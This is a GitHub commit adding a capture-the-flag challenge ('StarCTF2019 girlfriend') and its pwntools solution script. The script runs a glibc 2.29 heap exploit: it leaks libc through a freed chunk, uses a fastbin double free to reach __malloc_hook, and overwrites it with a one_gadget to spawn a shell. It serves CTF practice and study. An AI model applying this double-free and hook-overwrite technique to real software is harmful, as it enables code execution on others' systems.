Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 8d6026e

Browse files
committed
glibc2.29 tcache
1 parent 3efb826 commit 8d6026e

File tree

7 files changed

+69
-0
lines changed

7 files changed

+69
-0
lines changed

‎StarCTF2019_girlfriend/chall‎

9.98 KB
Binary file not shown.

‎StarCTF2019_girlfriend/chall.i64‎

186 KB
Binary file not shown.

‎StarCTF2019_girlfriend/flag‎

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
*CTF{******}
1.31 MB
Binary file not shown.

‎StarCTF2019_girlfriend/lib/libc.so.6‎

16.4 MB
Binary file not shown.

‎StarCTF2019_girlfriend/pwn‎

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
#!/bin/bash
2+
echo ICMgICAjICAgICMjIyMgICAgIyMjIyMgICMjIyMjIwogICMgIyAgICAjICAgICMgICAgICMgICAgIwojIyMgIyMjICAjICAgICAgICAgICMgICAgIyMjIyMKICAjICMgICAgIyAgICAgICAgICAjICAgICMKICMgICAjICAgIyAgICAjICAgICAjICAgICMKICAgICAgICAgICMjIyMgICAgICAjICAgICMK | base64 -d
3+
exec 2>/dev/null
4+
timeout 30 ./lib/ld-2.29.so --library-path ./lib ./chall

‎StarCTF2019_girlfriend/solve.py‎

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
2+
from pwn import *
3+
from time import sleep
4+
# context.log_level = "debug"
5+
context.log_level = "critical"
6+
context.binary = "./chall"
7+
elf = context.binary
8+
libc = elf.libc
9+
libc.sym['main_arena'] = 0x1e4c40
10+
libc.sym['one_gadget'] = 0x106ef8
11+
12+
def add(size, cont):
13+
io.sendlineafter("choice:", "1")
14+
io.sendlineafter("name\n", str(size))
15+
io.sendafter("name:\n", cont)
16+
sleep(0.01)
17+
io.sendafter("call:\n", '0000')
18+
sleep(0.01)
19+
20+
def show(idx):
21+
io.sendlineafter("choice:", "2")
22+
io.sendlineafter("index:\n", str(idx))
23+
24+
def delete(idx):
25+
io.sendlineafter("choice:", "4")
26+
io.sendlineafter("index:\n", str(idx))
27+
28+
def DEBUG():
29+
base = int(os.popen("pmap {}| awk '{{print 1ドル}}'".format(io.pid)).readlines()[1], 16)
30+
print("\n================= DEBUG: ================")
31+
print("pid -> {}".format(io.pid))
32+
print("malloc @ {:#x}".format(base + 0xC0A))
33+
print("free @ {:#x}".format(base + 0xDD6))
34+
print("================= DEBUG: ================\n")
35+
pause()
36+
37+
io = process("./chall")
38+
39+
add(0x450, '0')
40+
add(0x10, '1')
41+
delete(0)
42+
show(0)
43+
libc.address = u64(io.recvuntil("\x7f")[-6: ] + '0円0円') - libc.sym['main_arena'] - 96
44+
print("libc @ {:#x}".format(libc.address))
45+
46+
for i in xrange(7 + 1 + 2):
47+
add(0x68, str(i))
48+
for i in xrange(7 + 1):
49+
delete(i + 1)
50+
51+
delete(9) # a
52+
delete(10)# b -> a
53+
delete(9) # a -> b -> a
54+
55+
for i in xrange(7):
56+
add(0x68, str(i))
57+
58+
add(0x68, flat(libc.sym['__malloc_hook'] - 0x13)) # b -> a -> target
59+
add(0x68, 'x') # a -> target
60+
add(0x68, 'x') # target
61+
add(0x68, flat('0円' * 0xb, libc.sym['one_gadget'], libc.sym['__libc_realloc'] + 6))
62+
io.sendlineafter("choice:", "1")
63+
64+
io.interactive()

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /